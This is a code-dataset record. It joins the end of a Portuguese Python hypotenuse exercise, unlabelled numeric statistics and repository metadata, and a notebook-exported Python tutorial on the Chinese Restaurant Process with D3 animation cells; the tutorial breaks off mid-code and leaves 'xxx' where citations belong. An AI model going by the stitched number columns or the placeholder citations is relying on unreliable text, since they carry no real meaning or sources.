ca = float(input("Digite o cateto adjacente: "))
hi = (co ** 2 + ca ** 2 ) ** (1/2)
print("A hipotenusa vai medir {:.2f}".format(hi))'''
'''import math
co = float(input("Digite o cateto oposto: "))
ca = float(input("Digite o cateto adjacente: "))
hi = math.hypot(co, ca)
print("A hipotenusa vai medir {:.2f}".format(hi))'''
| 35.0625
| 52
| 0.645276
| 88
| 561
| 4.113636
| 0.261364
| 0.165746
| 0.265193
| 0.281768
| 0.88674
| 0.88674
| 0.88674
| 0.88674
| 0.792818
| 0.792818
| 0
| 0.014675
| 0.149733
| 561
| 16
| 53
| 35.0625
| 0.744235
| 0
| 0
| 0
| 0
| 0
| 0.418848
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b27050ea010658548da412cae429eac1171d5a41
| 84,802
|
py
|
Python
|
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
_build/jupyter_execute/.~Dirichlet Distribution.py
|
dudaspm/LDA_Bias_Data
|
ffbabb5765a878bf49bac68baaa083342243a616
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Dirichlet Distribution
# In[1]:
from IPython.display import HTML
def load_d3_in_cell_output():
display(HTML("<script src='https://d3js.org/d3.v6.min.js'></script>"))
get_ipython().events.register('pre_run_cell', load_d3_in_cell_output)
# ## The Chinese Restaurant Process
# In this thought problem, we will be examining a situation where a hungry person (🤔) enters a restaurant and needs to choose a table (⚪).
#
# This was originally developed by xxx, and a great resource to consider is Pasupat's (xxx).
#
# Here are the ground rules for this thought problem.
#
# ## Rules for Our Thought Problem
# ### 1. An Infinite Amount of Tables (⚪)
#
# We are depicting five tables (⚪⚪⚪⚪⚪), but we need to consider a situation where the number of tables is infinite.
#
# * ⚪ = ∞
# ### 2. A Hungry Person (🤔) Only Two Options
#
# When a hungry person (🤔) walks into the restaurant, they have two options:
#
# * Either they sit at a table (⚪) with someone else (😃)
# * or pick a new table (⚪)
#
# To simplify this, here is a decision chart.
# In[2]:
from IPython.display import SVG, display
display(SVG(url='https://raw.githubusercontent.com/dudaspm/LDA_Bias_Data/main/images/startCondition.svg'))
# And to further reduce this down, we will be using this:
# In[3]:
from IPython.display import SVG, display
display(SVG(url='https://raw.githubusercontent.com/dudaspm/LDA_Bias_Data/main/images/simpleStartCondition.svg'))
# ### 3. Many ⚪ & 😃, Only One Empty ⚪
#
# This goes with #2: in our scenario there will be a number of tables (⚪) with people (😃), but of the infinite number of empty tables (⚪) we will only consider *one* to be open. Another way to consider this is that a hungry person (🤔) either:
# * sits at *one of possibly many* tables (⚪) with someone else (😃)
# * *OR* sits at the *one* new table (⚪)
# ### 4. All Tables (⚪) are Equal
# Notice that all the tables are an equal distance away, so there is no weighting based on distance and each table is equally likely to be picked.
# In[4]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="runWeight()" value="Run Animation">\n<div id="runWeight"></div>\n\n<script type="text/javascript"> \n function runWeight() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#runWeight").select("svg").remove()\n var svg1 = d3.select("div#runWeight").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg1.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg1.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n svg1.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n runWeight()\n</script>')
# ### Key for Thought Problem
#
# > 🤔 - hungry person
# * The person who needs to find a seat at a table
#
# > 😃 - person eating
# * A person already at a table
#
# > ⚪ - a possible table
# * A potential seat for the hungry person to sit at
#
# > ⚫ - not a possible table
# * Not a potential seat for the hungry person to sit at (see Rule #3)
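# Before looking at the extremes, here is a minimal sketch (not part of the original notebook) that encodes the rules above: the restaurant is just a list of per-table head counts, and a hungry person either joins an occupied table or opens the *one* new table. The names `tables` and `seat_at` are hypothetical helpers introduced only for illustration.
# In[ ]:
def seat_at(tables, choice):
    """Seat the hungry person (🤔) at table index `choice`.
    Index len(tables) stands for the single open new table (Rule #3)."""
    if choice == len(tables):
        tables.append(1)  # open the one new table
    else:
        tables[choice] += 1  # join an occupied table
    return tables
tables = [3, 1]  # two occupied tables: 3 people (😃😃😃) and 1 person (😃)
print(seat_at(tables, 0))  # join the first table -> [4, 1]
print(seat_at(tables, 2))  # open the new table   -> [4, 1, 1]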
# ## All Solutions 💥TO THE EXTREME💥
# :::{note}
# "To the extreme!" was a popular phrase from the early 1990s. Meaning "to take something to its furthest limits." Most credit [Robert Matthew Van Winkle](https://en.wikipedia.org/wiki/Vanilla_Ice) for the phrase.
# :::
# Now that we have our ground rules, let's approach this problem from what I am calling the extreme positions. Up to this point, we have not mentioned a single bit of math, but this section will contain conversations around probabilities. Here are three scenarios for our extreme positions.
#
# 1. The Social Butterfly
# 2. The Gambler
# 3. The Long Day
# ### 1. The Social Butterfly
#
# The social butterfly assumes every person that enters the restaurant wants to sit at the table with the most people.
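# As a quick sketch of this extreme (hypothetical code, not from the original notebook): each arrival deterministically joins the fullest occupied table, so the first table absorbs everyone and the one new table is never picked.
# In[ ]:
def social_butterfly(tables):
    """Return the index of the occupied table with the most people (😃);
    the social butterfly never opens the new table."""
    return max(range(len(tables)), key=lambda i: tables[i])
tables = [1]  # one person is already seated
for _ in range(4):  # four hungry people (🤔) arrive in turn
    tables[social_butterfly(tables)] += 1
print(tables)  # [5] -- everyone ends up at the same table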
# In[5]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social1()" value="Run Animation">\n<div id="social1"></div>\n\n<script type="text/javascript"> \n function social1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#social1").select("svg").remove()\n var svg2 = d3.select("div#social1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg2.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg2.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1","0","0","0","0"]\n svg2.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg2.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n social1()\n</script>')
# In[6]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social2()" value="Run Animation">\n<div id="social2"></div>\n\n<script type="text/javascript"> \n function social2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social2").select("svg").remove()\n var svg3 = d3.select("div#social2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg3.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg3.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg3.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg3.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg3)\n }\n social2()\n</script>')
# In[7]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social3()" value="Run Animation">\n<div id="social3"></div>\n\n<script type="text/javascript"> \n function social3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social3").select("svg").remove()\n var svg4 = d3.select("div#social3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg4.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg4.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["2/2","0","0","0","0"]\n svg4.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg4.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,2,svg4)\n }\n social3()\n</script>')
# In[8]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social4()" value="Run Animation">\n<div id="social4"></div>\n\n<script type="text/javascript"> \n function social4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social4").select("svg").remove()\n var svg5 = d3.select("div#social4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg5.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg5.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["3/3","0","0","0","0"]\n svg5.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg5.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,3,svg5)\n }\n social4()\n</script>')
# In[9]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social5()" value="Run Animation">\n<div id="social5"></div>\n\n<script type="text/javascript"> \n function social5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social5").select("svg").remove()\n var svg6 = d3.select("div#social5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg6.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg6.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["4/4","0","0","0","0"]\n svg6.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg6.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,4,svg6)\n }\n social5()\n</script>')
# ### 2. The Gambler
#
# The Gambler is the person who only cares about the probabilities. Meaning, if there are two tables (⚪⚪), then they have a 50/50 choice between them, and they do not care at all about whether people are already sitting there or not.
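# To make that concrete, here is a minimal simulation of The Gambler's strategy (a hypothetical sketch, not part of the original animations): the choice is uniform over the open tables, so with two tables each gets picked about half the time.
# In[ ]:
import numpy as np

rng = np.random.default_rng(0)

def gambler_choice(open_tables):
    # The Gambler ignores who is already seated and picks uniformly at random
    return rng.choice(open_tables)

# With two open tables the split comes out roughly 50/50, matching the animations below
picks = [gambler_choice([0, 1]) for _ in range(10_000)]
print(np.bincount(picks) / len(picks))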
# In[10]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler1()" value="Run Animation">\n<div id="gambler1"></div>\n\n<script type="text/javascript"> \n function gambler1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#gambler1").select("svg").remove()\n var svg7 = d3.select("div#gambler1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg7.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg7.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg7.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg7.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n gambler1()\n</script>')
# In[11]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler2()" value="Run Animation">\n<div id="gambler2"></div>\n\n<script type="text/javascript"> \n function gambler2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler2").select("svg").remove()\n var svg8 = d3.select("div#gambler2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg8.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg8.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/2","1/2","0","0","0"]\n svg8.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg8.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 